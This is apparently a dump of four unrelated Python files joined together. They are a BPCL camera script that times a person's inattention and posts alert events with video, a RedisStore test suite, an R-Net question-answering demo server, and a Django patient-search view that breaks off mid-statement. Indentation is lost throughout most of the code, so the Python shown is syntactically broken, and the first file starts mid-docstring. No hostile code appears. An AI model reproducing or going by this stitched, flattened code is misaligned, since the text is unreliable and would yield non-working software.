Palert_time(duration of the timer),Pflag(if the erue or false for the particular frame)
Note: variables are similar for all three events
User Requirements:
1} Start Timer and Raise Alarm when person is not attentive.
Requirements:
1) check if the flag is true or false for the given event/algo
2) If the flag is false for continuosly for buffer time(2 seconds or more) then initiate the timer
3) I fthe flag is still false for the Timer period(Palert_time) than we call the event function
4) In between if the person comes back then we restart the process
Start_video function
Input: event name and cam (cv2 camera feed object),
variable: vid_path(path of the video on device to sent with event api call),
Requirement:
1) start saving camera feed into a video when timer has started for any event upto video duration time
event_call function
Input: event name
Requirements
1) it create a Clientsocket object with unique device id
2) sends the Event information with Timestamp and the path of the video to the Pi device
video_trigger function
Input: cam(cv2 camera feed object)
Requirements:
1)It checks if the Timer for any event Alert has been started.
2) Checks if a folder has been created for today or not.
3) If not it creates a folder
4) if the Timer has started then it create a thread for saving a video(Start_video)
"""
from datetime import datetime,timedelta
from sockets import ClientSocket
import json
import cv2
from threading import Thread
import error
import shutil
import time
import os
er =0
config1="/home/smartcow/BPCL/BPCL_final/UI_parameters.json"
config="/home/smartcow/BPCL/BPCL_final/BPCL_config.json"
with open(config) as json_data:
info=json.load(json_data)
Palert_frame,Dalert_frame,Malert_frame= info["Palert_frame"],info["Dalert_frame"],info['Malert_frame']
event_file,gpu_path,temp_folder = info["event_file"],info["gpu_path"],info["temp_folder"]
with open(config1) as json_data:
info =json.load(json_data)
Palert_time,Dalert_time=int(info["Person_ROI_unavailable"]), int(info["Person_not_attentive"])
Roi_rectify,attentive_rectify=int(info["Person_ROI_rectify"]),int(info["Person_attentive_rectify"])
Malert_time=Dalert_time
print("Palert -> ", Palert_time, Dalert_time, Malert_time)
Ptimer,Pdetect,Pcheck,Pst_time,Ptrigger,Prectify,Pback,Pfp_time,Pvideo,Ppath,Pvend_time = 0,0,0,0,0,0,0,0,0,0,0
Dtimer,Ddetect,Dcheck,Dst_time,Dtrigger,Drectify,Dback,Dfp_time,Dvideo,Dpath,Dvend_time = 0,0,0,0,0,0,0,0,0,0,0
Mtimer,Mdetect,Mcheck,Mst_time,Mtrigger,Mrectify,Mback,Mfp_time,Mvideo,Mpath,Mvend_time = 0,0,0,0,0,0,0,0,0,0,0
vid_path="/media/smartcow/LFS/"
video_flag =0
temp_file="/media/smartcow/LFS/"
fourcc = cv2.VideoWriter_fourcc(*'XVID')
def start_video(event):
global Pvideo,Mvideo,Dvideo,Ppath,Dpath,Mpath,Pevent_out,Mevent_out,Devent_out,Pvend_time,Mvend_time,Dvend_time,Palert_time,Dalert_time,Malert_time
vid_dir=(datetime.now()).strftime("%Y_%m_%d")
loc=gpu_path+vid_dir+"/"
if not os.path.isdir(loc):
#print("make directory")
os.mkdir(loc)
if event == "EVENT21_ON":
description = "PERSON_NOT_IN_ROI"
elif event == "EVENT22_ON" or event == "EVENT23_ON":
description = "PERSON_NOT_ATTENTIVE"
vid_name="RAIPUR_BPCL_NX1_"+description+"_"+event+"_"+(datetime.now()).strftime("%Y-%m-%dT%H-%M-%S")+".avi"
if event == "EVENT21_ON":
Ppath = loc+vid_name
Pvideo = temp_folder+vid_name
Pevent_out=cv2.VideoWriter(Pvideo,fourcc, 3, (1280,720), True)
Pvend_time=datetime.now()+timedelta(seconds=Palert_time)
elif event == "EVENT22_ON":
Dpath = loc+vid_name
Dvideo = temp_folder+vid_name
Devent_out=cv2.VideoWriter(Dvideo,fourcc, 3, (1280,720), True)
Dvend_time=datetime.now()+timedelta(seconds=Dalert_time)
elif event == "EVENT23_ON":
Mpath = loc+vid_name
Mvideo = temp_folder+vid_name
Mevent_out=cv2.VideoWriter(Mvideo,fourcc, 3, (1280,720), True)
Mvend_time=datetime.now()+timedelta(seconds=Malert_time)
def video_function(event,cam):
global Pvend_time,Dvend_time,Mvend_time,Ptimer,Dtimer,Mtimer,Pevent_out,Devent_out,Mevent_out
while True:
if (Dtimer > 0 or Mtimer > 0 or Ptimer >0):
img = cam.get_frame()
#print (img)
#cv2.imwrite("check.jpg",img)
img = cv2.resize(img,(1280,720))
            encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 50] # Giving the required quality
result, encimg = cv2.imencode('.jpg',img, encode_param) #Encoding frame
img = cv2.imdecode(encimg, 1)
ls_time = datetime.now()
#print (Pvend_time)
if Pvend_time != 0:
if datetime.now()>Pvend_time:
#print ("******************* breaking **********************")
Pvend_time=0
Pevent_out.release()
Pevent_out.write(img)
#print("&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&writen&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&")
if Dvend_time != 0:
if datetime.now()>Dvend_time:
Dvend_time = 0
Devent_out.release()
Devent_out.write(img)
if Mvend_time != 0:
if datetime.now()>Mvend_time:
Mvend_time=0
Mevent_out.release()
Mevent_out.write(img)
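            # Pace the loop to roughly one frame every 300 ms, matching the fps=3
            # used when the VideoWriter objects are created in start_video().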
le_time = datetime.now()
while(int((le_time -ls_time).total_seconds()*1000) < 300 ):
le_time = datetime.now()
def event_call(event,temp,path):
global er
try:
sc=ClientSocket(device_id=str('BPCL_RAI_NX_0001'))
except Exception as e:
print("Client socket error")
er=er+1
if er < 4:
time.sleep(1)
            event_call(event, temp, path)
error.raised("3",str(e))
try:
logdate=(datetime.now()).strftime("%Y-%m-%d %H:%M:%S")
#print("video Path {}".format(vid_path))
if path == None:
if event == "Reset":
data={'event_time':logdate,'event_description':"Reset function"}
elif event == "EVENT21_OFF":
data={'event_time':logdate,'event_description':"Person not in ROI Rectified"}
elif event == "EVENT22_OFF" or event == "EVENT23_OFF":
data={'event_time':logdate,'event_description':"Person not attentive Rectified"}
else:
shutil.move(temp,path)
print("file moved from {} to {}".format(temp,path))
if event == "EVENT21_ON":
data={'event_time':logdate,'path':path,'event_description':"Person not in ROI"}
elif event == "EVENT22_ON" or event == "EVENT23_ON":
data={'event_time':logdate,'path':path,'event_description':"Person not attentive"}
print(data)
if event == "Reset":
event = "EVENT21_OFF"
sc.send(time_stamp=logdate, message_type=event, data=data)
msg = sc.receive()
print(msg)
if int(msg["data"]["status"]) == 200:
print("API success")
else:
print("API failed please check")
error.raised("3","API failed")
except Exception as e:
print("error in event_call function")
error.raised("3",str(e))
def timer(algo,flag,cam):
try:
global Pvideo,Mvideo,Dvideo,Ppath,Dpath,Mpath,Pfp_time,Mfp_time,Dfp_time,Prectify,Drectify,Mrectify,Pback,Mback,Dback,vid_path,Ptimer,Pdetect,Palert_frame,Palert_time,Pcheck,Pst_time,Ptrigger, Dtimer,Ddetect,Dcheck,Dst_time,Dtrigger,Dalert_frame,Dalert_time,Mtimer,Mdetect,Mcheck,Mst_time,Mtrigger,Malert_frame,Malert_time
if algo == "person" :
Pflag = flag
if Pflag == True:
print("person pflag",Pflag,Ptimer,Pdetect, Palert_frame)
Pcheck = 0
Pdetect = Pdetect +1
if Ptimer != 0 and Pdetect > Palert_frame:
if Ptimer ==1:
Ptimer=0
if Mtimer ==1:
Mtimer=0
if Dtimer==1:
Dtimer=0
if Ptimer == 2 and Pback ==0:
Prectify =datetime.now()
#Ptimer=0
Pback =1
print("AFter Ptimer2",Pdetect, Ptimer)
if Pback == 1 and datetime.now() > Prectify + timedelta(seconds=Roi_rectify):
with open(event_file,'w') as efile:
efile.write("EVENT21_OFF :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT21_OFF",None,None)
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* Rectification!!! Person in ROI ******* Time : " , current_time)
Ptimer=0
else:
print("ptimer",Ptimer,Pcheck,Pdetect, Palert_frame)
if Pcheck == 0 and Ptimer == 0:
Pst_time =datetime.now()
Pcheck = 1
if datetime.now() > Pst_time + timedelta(seconds=3) and Ptimer == 0 and Pcheck == 1:
Pflag = False
if Mtimer == 1:
Mtimer =0
if Dtimer == 1:
Dtimer =0
Ptimer=1
Pback=0
video_trigger(cam,"EVENT21_ON")
Pdetect=0
Ptrigger=datetime.now()
Pfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("*********** Person Timer Started ******* Time : ", current_time)
elif Ptimer ==1 and Pdetect <= Palert_frame and datetime.now() > Ptrigger + timedelta(seconds=Palert_time):
with open(event_file,'w') as efile:
#efile.write("EVENT21_OFF",(datetime.now()).strftime("%Y_%m_%dT%H-%M-%S"))
efile.write("EVENT21_ON :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT21_ON",Pvideo,Ppath)
Pfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* ALERT!!! Person not in ROI ******* Time : " , current_time)
Ptimer = 2
Dtimer,Mtimer = 0,0
elif Ptimer != 0 and datetime.now() > Pfp_time + timedelta(seconds=5):
Pdetect=0
Pfp_time=datetime.now()
if algo == "direction":
Dflag = flag
if Dflag ==True:
Dcheck = 0
Ddetect = Ddetect +1
if Dtimer != 0 and Ddetect > Dalert_frame:
if Dtimer ==1:
Dtimer=0
if Mtimer ==1:
Mtimer=0
elif Dtimer == 2 and Dback==0:
Dback=1
Drectify=datetime.now()
#Dtimer=0
elif Dback ==1 and datetime.now() > Drectify +timedelta(seconds=attentive_rectify):
with open(event_file,'w') as efile:
efile.write("EVENT22_OFF :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT22_OFF",None,None)
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* Rectification!!! Person is attentive ******* Time : " , current_time)
Dtimer = 0
else:
if Dcheck == 0 and Dtimer == 0:
Dst_time =datetime.now()
Dcheck = 1
if datetime.now() > Dst_time + timedelta(seconds=3) and Dtimer == 0 and Dcheck == 1:
flag = False
if Mtimer == 1:
Mtimer=0
Dtimer=1
Dback=0
video_trigger(cam,"EVENT22_ON")
Ddetect=0
Dtrigger=datetime.now()
Dfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("*********** Direction Timer Started ***** Time : ", current_time)
elif Dtimer ==1 and Ddetect <= Dalert_frame and datetime.now() > Dtrigger + timedelta(seconds=Dalert_time):
with open(event_file,'w') as efile:
#efile.write("EVENT22_OFF",(datetime.now()).strftime("%Y_%m_%dT%H-%M-%S"))
efile.write("EVENT22_ON :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT22_ON",Dvideo,Dpath)
Dfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* ALERT!!! not looking in that direction ***** Time : ", current_time)
Dtimer = 2
Mtimer = 0
elif Dtimer != 0 and datetime.now() > Dfp_time + timedelta(seconds=5):
Ddetect=0
Dfp_time = datetime.now()
if algo == "motion":
Mflag = flag
if Mflag == True:
Mcheck = 0
Mdetect = Mdetect +1
if Mtimer != 0 and Mdetect > Malert_frame:
if Mtimer == 1:
Mtimer=0
elif Mtimer == 2 and Mback==0:
Mback =1
Mrectify=datetime.now()
#Mtimer=0
elif Mback ==1 and datetime.now() > Mrectify +timedelta(seconds=4):
with open(event_file,'w') as efile:
efile.write("EVENT23_OFF :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT23_OFF",None,None)
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* Rectification!!! Person is attentive ******* Time : " , current_time)
Mtimer = 0
else:
if Mcheck == 0 and Mtimer == 0:
Mst_time =datetime.now()
Mcheck = 1
if datetime.now() > Mst_time + timedelta(seconds=3) and Mtimer == 0 and Mcheck == 1:
flag = False
Mtimer=1
Mback=0
video_trigger(cam,"EVENT23_ON")
Mdetect=0
Mtrigger=datetime.now()
Mfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("*********** Motion Timer Started *** Time : ", current_time)
elif Mtimer ==1 and Mdetect <= Malert_frame and datetime.now() > Mtrigger + timedelta(seconds=Malert_time):
with open(event_file,'w') as efile:
#efile.write("EVENT23_OFF",(datetime.now()).strftime("%Y_%m_%dT%H-%M-%S"))
efile.write("EVENT23_ON :: "+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("EVENT23_ON",Mvideo,Mpath)
Mfp_time=datetime.now()
current_time = datetime.now()
current_time = str(current_time)[10:]
print("********* ALERT!!! Motion is not detected *** Time :", current_time)
Mtimer = 2
elif Mtimer != 0 and datetime.now() > Mfp_time + timedelta(seconds=5):
Mdetect=0
Mfp_time=datetime.now()
except Exception as e:
print (str(e),"error in timer")
error.raised("7",str(e))
def video_trigger(cam,event):
global video_flag
try:
start_video(event)
time.sleep(1)
if video_flag == 0:
video=Thread(target=video_function,args=(event,cam))
video.start()
video_flag =1
except Exception as e:
print (str(e),"error in timer")
error.raised("7",str(e))
def reset():
global Ptimer,Mtimer,Dtimer
print("Resetting timers in reset")
with open(event_file, 'w') as efile:
efile.write("EVENT_ALL_OFF ::"+ datetime.now().strftime("%Y_%m_%dT%H-%M-%S"))
event_call("Reset",None,None)
Ptimer,Dtimer,Mtimer=0,0,0
|
test_store.py
|
# Unit test suite for the RedisStore class.
# This test suite now runs in its own docker container. To build the image, run
# docker build -f Dockerfile-test -t abaco/testsuite .
# from within the tests directory.
#
# To run the tests, first start the development stack using:
# 1. export abaco_path=$(pwd)
# 2. docker-compose -f docker-compose-local-db.yml up -d (from within the root directory)
# 3. docker-compose -f docker-compose-local.yml up -d (from within the root directory)
# Then, also from the root directory, execute:
# docker run -e base_url=http://172.17.0.1:8000 -v $(pwd)/local-dev.conf:/etc/abaco.conf --entrypoint=py.test -it --rm jstubbs/abaco_testsuite /tests/test_store.py
from datetime import datetime
import pytest
import os
import sys
import threading
import time
import timeit
sys.path.append(os.path.split(os.getcwd())[0])
sys.path.append('/actors')
from config import Config
from store import RedisStore, MongoStore
# this is the store to test
store = os.environ.get('store', 'redis')
# this is the number of iterations executed in each thread, per test.
n = 500
@pytest.fixture(scope='session')
def st():
if store == 'redis':
rs = RedisStore(Config.get('store', 'redis_host'), Config.getint('store', 'redis_port'), db='11')
# override the configured expiration time
rs.ex = 1
return rs
else:
ms = MongoStore(Config.get('store', 'mongo_host'), Config.getint('store', 'mongo_port'), db='11')
# we want to recreate the index each time so we start off trying to drop it, but the first time we run
# after the db is instantiated the index won't exist.
try:
ms._db.drop_index('exp_1')
except Exception:
pass
ms._db.create_index('exp', expireAfterSeconds=1)
return ms
def test_set_key(st):
st['test'] = 'val'
assert st.get('test') == 'val'
def test_set_with_expiry(st):
st.set_with_expiry('test_exp', 'val')
assert st.get('test_exp') == 'val'
# in our tests, the mongo expiry functionality is NOT dependable; it seems to eventually remove the key but the time
# it takes seems to fluctuate. for mongo, we'll test at the end of the suite to make sure the key is removed.
if store == 'redis':
time.sleep(1)
with pytest.raises(KeyError):
st['test_exp']
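# Helper used by the concurrency tests below: a second thread repeatedly updates the
# 'k2' field of the 'test' key while the main thread works on other fields/keys.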
def _thread(st, n):
for i in range(n):
st.update('test', 'k2', 'w{}'.format(i))
def test_update(st):
st['test'] = {'k': 'v',
'k2': 'v2'}
t = threading.Thread(target=_thread, args=(st, n))
t.start()
for i in range(n):
st.update('test', 'k', 'v{}'.format(i))
t.join()
assert st['test'] == {'k': 'v{}'.format(n-1), 'k2': 'w{}'.format(n-1)}
def test_pop_field(st):
st['test'] = {'k': 'v', 'k2': 'v2', 'key': 'val'}
# this is the naive functionality we want; of course, this is not thread safe:
cur = st['test']
val = cur.pop('key')
st['test'] = cur
assert val == 'val'
assert st['test'] == {'k': 'v', 'k2': 'v2'}
# here's the non-threaded test:
st['test'] = {'k': 'v', 'k2': 'v2', 'key': 'val'}
assert st['test']['key'] == 'val'
val = st.pop_field('test', 'key')
assert val == 'val'
assert not type(st['test']) == str
# and finally, a threaded test:
st['test'] = {'k': 'v', 'k2': 'v2'}
for i in range(n):
st.update('test', 'key{}'.format(i), 'v{}'.format(i))
st['test']['key0'] = 'v0'
assert st['test']['key0'] == 'v0'
assert st['test']['key{}'.format(n-1)] == 'v{}'.format(n-1)
t = threading.Thread(target=_thread, args=(st, n))
t.start()
for i in range(n):
val = st.pop_field('test', 'key{}'.format(i))
assert val == 'v{}'.format(i)
t.join()
assert st['test'] == {'k': 'v', 'k2': 'w{}'.format(n-1)}
def test_update_subfield(st):
st['test'] = {'k': {'sub': 'v'},
'k2': 'v2'}
t = threading.Thread(target=_thread, args=(st, n))
t.start()
for i in range(n):
st.update_subfield('test', 'k', 'sub', 'v{}'.format(i))
t.join()
assert st['test'] == {'k': {'sub': 'v{}'.format(n-1)}, 'k2': 'w{}'.format(n-1)}
def test_getset(st):
st['test'] = {'k': 'v',
'k2': 'v2'}
st['k'] = 'v0'
t = threading.Thread(target=_thread, args=(st, n))
t.start()
for i in range(n):
v = st.getset('k', 'v{}'.format(i))
if i ==0:
assert v == 'v0'
else:
assert v == 'v{}'.format(i-1)
t.join()
assert st['test'] == {'k': 'v', 'k2': 'w{}'.format(n-1)}
assert st['k'] == 'v{}'.format(n-1)
def test_within_transaction(st):
# mongo store does not support within_transaction
if not store == 'redis':
return
def _th():
"""A separate thread that is going to compete with the main thread to make updates on the key."""
assert st['k'] == 'v'
time.sleep(1)
# try to update the value of 'k'; this should take a while since the other thread has a lock
start = timeit.default_timer()
st['k'] = 'v2'
stop = timeit.default_timer()
assert st['k'] == 'v2'
tot = stop - start
assert tot > 2.0
def _transaction(val):
"""Represents business logic that should be wrapped in a transaction."""
# make sure we are passed the value
assert val == 'v'
# also, get the key and assert the original value
assert st['k'] == 'v'
# now sleep some time
time.sleep(3)
# now, update the key:
st['k'] = 'foo'
assert st['k'] == 'foo'
st['k'] = 'v'
# first start a new thread that will sleep for 1 second before trying to change the value
t = threading.Thread(target=_th)
t.start()
# now, start a transaction in the main thread:
st.within_transaction(_transaction, 'k')
def test_set_with_expiry2(st):
# in our tests, the mongo expiry functionality is NOT dependable; it seems to eventually remove the key but the time
# it takes seems to fluctuate. for mongo, we'll test at the end of the suite to make sure the key is removed.
tot = 0
while tot < 5:
try:
st['test_exp']
except KeyError:
return
tot += 1
time.sleep(2)
|
demo.py
|
#!/usr/bin/env python
# coding=utf-8
import tensorflow as tf
import bottle
from bottle import route, run
import threading
import json
import numpy as np
from prepro import convert_to_features, word_tokenize
from time import sleep
import math
'''
This file is taken and modified from R-Net by Minsangkim142
https://github.com/minsangkim142/R-net
'''
app = bottle.Bottle()
query = []
response = ""
@app.get("/")
def home():
with open('demo.html', 'r') as fl:
html = fl.read()
return html
@app.post('/answer')
def answer():
passage = bottle.request.json['passage']
question = bottle.request.json['question']
print("received question: {}".format(question))
# if not passage or not question:
# exit()
global query, response
query = (passage, question)
while not response:
sleep(0.1)
print("received response: {}".format(response))
response_ = {"answer": response}
response = []
return response_
class Demo(object):
def __init__(self, model, config):
run_event = threading.Event()
run_event.set()
threading.Thread(target=self.demo_backend, args = [model, config, run_event]).start()
app.run(port=8080, host='0.0.0.0')
try:
while 1:
sleep(.1)
except KeyboardInterrupt:
print("Closing server...")
run_event.clear()
def demo_backend(self, model, config, run_event):
global query, response
with open(config.word_dictionary, "r") as fh:
word_dictionary = json.load(fh)
with open(config.char_dictionary, "r") as fh:
char_dictionary = json.load(fh)
sess_config = tf.ConfigProto(allow_soft_placement=True)
sess_config.gpu_options.allow_growth = True
with model.graph.as_default():
with tf.Session(config=sess_config) as sess:
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver()
saver.restore(sess, tf.train.latest_checkpoint(config.save_dir))
if config.decay < 1.0:
sess.run(model.assign_vars)
while run_event.is_set():
sleep(0.1)
if query:
context = word_tokenize(query[0].replace("''", '" ').replace("``", '" '))
c,ch,q,qh = convert_to_features(config, query, word_dictionary, char_dictionary)
fd = {'context:0': [c],
'question:0': [q],
'context_char:0': [ch],
'question_char:0': [qh]}
yp1,yp2, logits1, logits2 = sess.run([model.yp1, model.yp2, model.logits1, model.logits2], feed_dict = fd)
log_prob1 = logits1[0][yp1[0]]
log_prob2 = logits2[0][yp2[0]]
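                        # Squash the raw start/end logits through a sigmoid to get a
                        # rough confidence value in (0, 1) for each span boundary.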
score1 = 1/(1+math.exp(-log_prob1))
score2 = 1/(1+math.exp(-log_prob2))
print("SV Confidence: ", score1, "EV Confidence: ", score2)
yp2[0] += 1
response = " ".join(context[yp1[0]:yp2[0]])
query = []
|
views.py
|
import datetime
import logging
import re
import threading
from typing import Optional, List
import pytz
import simplejson as json
from django.contrib.auth.decorators import login_required
from laboratory.decorators import group_required
from django.core.exceptions import ValidationError
from django.db import transaction, connections
from django.db.models import Prefetch, Q
from django.forms import model_to_dict
from django.http import JsonResponse
from api import sql_func
from appconf.manager import SettingManager
from clients.models import (
CardBase,
Individual,
Card,
Document,
DocumentType,
District,
AnamnesisHistory,
DispensaryReg,
CardDocUsage,
BenefitReg,
BenefitType,
VaccineReg,
Phones,
AmbulatoryData,
AmbulatoryDataHistory,
DispensaryRegPlans, ScreeningRegPlan,
)
from contracts.models import Company
from directions.models import Issledovaniya
from directory.models import Researches
from laboratory import settings
from laboratory.utils import strdate, start_end_year, localtime
from rmis_integration.client import Client
from slog.models import Log
from statistics_tickets.models import VisitPurpose
from tfoms.integration import match_enp, match_patient
from directory.models import DispensaryPlan
from utils.data_verification import data_parse
logger = logging.getLogger(__name__)
def full_patient_search_data(p, query):
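    """Split a free-text query of the form "Family [Name [Patronymic] [dd.mm.yyyy]]"
    into its parts and build the corresponding RMIS patient-search request."""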
dp = re.compile(r'^[0-9]{2}\.[0-9]{2}\.[0-9]{4}$')
split = str(re.sub(' +', ' ', str(query))).split()
n = p = ""
f = split[0]
rmis_req = {"surname": f + "%"}
if len(split) > 1:
n = split[1]
rmis_req["name"] = n + "%"
if len(split) > 2:
if re.search(dp, split[2]):
split = [split[0], split[1], '', split[2]]
else:
p = split[2]
rmis_req["patrName"] = p + "%"
if len(split) > 3:
if '.' in split[3]:
btday = split[3].split(".")
elif len(split[3]) == 8 and split[3].isdigit():
btday = [split[3][0:2], split[3][2:4], split[3][4:8]]
else:
btday = None
if btday:
btday = btday[2] + "-" + btday[1] + "-" + btday[0]
rmis_req["birthDate"] = btday
return f, n, p, rmis_req, split
@login_required
def patients_search_card(request):
objects = []
data = []
d = json.loads(request.body)
inc_rmis = d.get('inc_rmis')
always_phone_search = d.get('always_phone_search')
tfoms_module = SettingManager.l2('tfoms')
birthday_order = SettingManager.l2('birthday_order')
inc_tfoms = d.get('inc_tfoms') and tfoms_module
card_type = CardBase.objects.get(pk=d['type'])
query = d.get('query', '').strip()
suggests = d.get('suggests', False)
extended_search = d.get('extendedSearch', False)
limit = min(int(d.get('limit', 10)), 20)
form = d.get('form', {})
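    # Query patterns: p - three initials plus a ddmmyyyy birthday, p2/p_tfoms - full name
    # with an optional birthday, p3 - a plain numeric card number, p_enp_re - a 16-digit
    # ENP (ОМС policy) number, p4 - an explicit "card_pk:<id>" reference, p5 - "phone:" search.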
p = re.compile(r'^[а-яё]{3}[0-9]{8}$', re.IGNORECASE)
p2 = re.compile(r'^([А-яЁё\-]+)( ([А-яЁё\-]+)(( ([А-яЁё\-]*))?( ([0-9]{2}\.?[0-9]{2}\.?[0-9]{4}))?)?)?$')
p_tfoms = re.compile(r'^([А-яЁё\-]+) ([А-яЁё\-]+)( ([А-яЁё\-]+))? (([0-9]{2})\.?([0-9]{2})\.?([0-9]{4}))$')
p3 = re.compile(r'^[0-9]{1,15}$')
p_enp_re = re.compile(r'^[0-9]{16}$')
p_enp = bool(re.search(p_enp_re, query))
p4 = re.compile(r'card_pk:\d+(:(true|false))?', flags=re.IGNORECASE)
p4i = bool(re.search(p4, query.lower()))
p5 = re.compile(r'phone:.+')
p5i = bool(re.search(p5, query))
pat_bd = re.compile(r"\d{4}-\d{2}-\d{2}")
c = None
has_phone_search = False
inc_archive = form and form.get('archive', False)
if extended_search and form:
q = {}
family = str(form.get('family', ''))
if family:
q['family__istartswith'] = family
name = str(form.get('name', ''))
if name:
q['name__istartswith'] = name
patronymic = str(form.get('patronymic', ''))
if patronymic:
q['patronymic__istartswith'] = patronymic
birthday = str(form.get('birthday', ''))
if birthday:
birthday_parts = birthday.split('.')
if len(birthday_parts) == 3:
if birthday_parts[0].isdigit():
q['birthday__day'] = int(birthday_parts[0])
if birthday_parts[1].isdigit():
q['birthday__month'] = int(birthday_parts[1])
if birthday_parts[2].isdigit():
q['birthday__year'] = int(birthday_parts[2])
objects = Individual.objects.all()
if q:
objects = objects.filter(**q)
enp_s = str(form.get('enp_s', ''))
enp_n = str(form.get('enp_n', ''))
if enp_n:
if enp_s:
                objects = objects.filter(document__serial=enp_s, document__number=enp_n, document__document_type__title='Полис ОМС')
else:
objects = objects.filter(document__number=enp_n, document__document_type__title='Полис ОМС')
pass_s = str(form.get('pass_s', ''))
pass_n = str(form.get('pass_n', ''))
if pass_n:
objects = objects.filter(document__serial=pass_s, document__number=pass_n, document__document_type__title='Паспорт гражданина РФ')
snils = str(form.get('snils', ''))
        if snils:
objects = objects.filter(document__number=snils, document__document_type__title='СНИЛС')
medbook_number = str(form.get('medbookNumber', ''))
if medbook_number and SettingManager.l2('profcenter'):
objects = objects.filter(card__medbook_number=medbook_number)
phone = str(form.get('phone', ''))
if phone:
normalized_phones = Phones.normalize_to_search(phone)
if normalized_phones:
objects = objects.filter(
Q(card__phones__normalized_number__in=normalized_phones) |
Q(card__phones__number__in=normalized_phones) |
Q(card__phone__in=normalized_phones) |
Q(card__doctorcall__phone__in=normalized_phones)
)
elif p5i or (always_phone_search and len(query) == 11 and query.isdigit()):
has_phone_search = True
phone = query.replace('phone:', '')
normalized_phones = Phones.normalize_to_search(phone)
objects = list(Individual.objects.filter(
Q(card__phones__normalized_number__in=normalized_phones) |
Q(card__phones__number__in=normalized_phones) |
Q(card__phone__in=normalized_phones) |
Q(card__doctorcall__phone__in=normalized_phones)
))
elif p_enp:
if tfoms_module and not suggests:
from_tfoms = match_enp(query)
if from_tfoms and isinstance(from_tfoms, dict):
Individual.import_from_tfoms(from_tfoms)
objects = list(Individual.objects.filter(document__number=query, document__document_type__title='Полис ОМС'))
elif not p4i:
if inc_tfoms:
t_parts = re.search(p_tfoms, query.lower()).groups()
t_bd = "{}-{}-{}".format(t_parts[7], t_parts[6], t_parts[5])
from_tfoms = match_patient(t_parts[0], t_parts[1], t_parts[2], t_bd)
if isinstance(from_tfoms, list):
for t_row in from_tfoms:
if isinstance(t_row, dict):
Individual.import_from_tfoms(t_row, no_update=True)
if re.search(p, query.lower()):
initials = query[0:3].upper()
btday = query[7:11] + "-" + query[5:7] + "-" + query[3:5]
if not pat_bd.match(btday):
return JsonResponse([], safe=False)
try:
objects = list(
Individual.objects.filter(family__startswith=initials[0], name__startswith=initials[1], patronymic__startswith=initials[2], birthday=btday, card__base=card_type)
)
if ((card_type.is_rmis and len(objects) == 0) or (card_type.internal_type and inc_rmis)) and not suggests:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base({"surname": query[0] + "%", "name": query[1] + "%", "patrName": query[2] + "%", "birthDate": btday}, fio=True)
except Exception as e:
logger.exception(e)
elif re.search(p2, query):
f, n, p, rmis_req, split = full_patient_search_data(p, query)
if len(split) > 3 or (len(split) == 3 and split[-1].isdigit()):
sbd = split[-1]
if len(sbd) == 8:
sbd = "{}.{}.{}".format(sbd[0:2], sbd[2:4], sbd[4:8])
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, card__base=card_type, birthday=datetime.datetime.strptime(sbd, "%d.%m.%Y").date())
if len(split) > 3:
                    objects = objects.filter(patronymic__istartswith=p)
objects = objects[:10]
else:
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p, card__base=card_type)[:10]
if ((card_type.is_rmis and (len(objects) == 0 or (len(split) < 4 and len(objects) < 10))) or (card_type.internal_type and inc_rmis)) and not suggests:
objects = list(objects)
try:
if not c:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base(rmis_req, fio=True, limit=10 - len(objects))
except Exception as e:
logger.exception(e)
if (
(re.search(p3, query) and not card_type.is_rmis)
or (len(objects) == 0 and len(query) == 16 and not p_enp and card_type.internal_type)
or (card_type.is_rmis and not re.search(p3, query))
):
resync = True
if len(objects) == 0:
resync = False
try:
objects = Individual.objects.filter(card__number=query.upper(), card__base=card_type)
if not inc_archive:
objects = objects.filter(card__is_archive=False)
objects = list(objects)
if (card_type.is_rmis or card_type.internal_type) and len(objects) == 0 and len(query) == 16 and not suggests:
if not c:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base(query)
elif not suggests:
resync = True
except Exception as e:
logger.exception(e)
if resync and card_type.is_rmis and not suggests:
if not c:
c = Client(modules="patients")
sema = threading.BoundedSemaphore(10)
threads = list()
def sync_i(ind_local: Individual, client: Client):
sema.acquire()
try:
ind_local.sync_with_rmis(c=client)
finally:
sema.release()
try:
connections.close_all()
logger.exception("Closed db connections")
except Exception as e:
logger.exception(f"Error closing connections {e}")
for obj in objects:
thread = threading.Thread(target=sync_i, args=(obj, c))
threads.append(thread)
thread.start()
if p4i:
parts = query.split(":")
cards = Card.objects.filter(pk=int(parts[1]))
inc_archive = inc_archive or (len(parts) > 2 and parts[2] == 'true')
else:
cards = Card.objects.filter(base=card_type, individual__in=objects)
if not has_phone_search and re.match(p3, query):
cards = cards.filter(number=query)
if p_enp and cards:
cards = cards.filter(carddocusage__document__number=query, carddocusage__document__document_type__title='Полис ОМС')
if cards:
medbook_number = str(form.get('medbookNumber', ''))
if medbook_number and SettingManager.l2('profcenter'):
cards = cards.filter(medbook_number=medbook_number)
d1, d2 = start_end_year()
if birthday_order:
cards = cards.order_by('-individual__birthday')
if not inc_archive:
cards = cards.filter(is_archive=False)
row: Card
for row in (
cards
.select_related("individual", "base")
.prefetch_related(
Prefetch(
'individual__document_set',
